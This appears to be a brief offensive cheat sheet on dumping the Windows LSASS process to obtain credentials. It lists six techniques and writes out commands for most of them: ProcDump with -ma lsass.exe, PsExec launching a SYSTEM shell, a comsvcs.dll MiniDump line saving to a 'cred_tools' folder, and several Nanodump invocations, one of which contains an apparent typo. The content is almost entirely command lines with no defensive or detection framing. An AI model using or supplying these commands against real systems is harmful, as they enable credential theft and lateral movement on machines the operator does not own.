LSASS Dumping

LSASS - Techniques

• Task Manager

• Procdump

• System Informer

• Comsvcs.dll

• Nanodump

• Dumpert

Lsass Dump: Task Manager

procdump.exe -accepteula -ma lsass.exe lsadump.dmp

Lsass Dump: System Informer

Lsass Dump: Comsvcs.dll

./PsExec -i -d -s cmd.exe

C:\Windows\System32\comsvcs.dll, MiniDump 688 C:\Users\<user>\Documente\cred_tools\lsass_dump\dmp\lsass.dmp full

Lsass Dump: Nanodump

./nanodump.x64.exe --write normal_lsass.dmp

./nanodump.x64.exe --silen-process-exit .\wer_lsas

Lsass Dump: Dumpert

Outflank-Dumpert.exe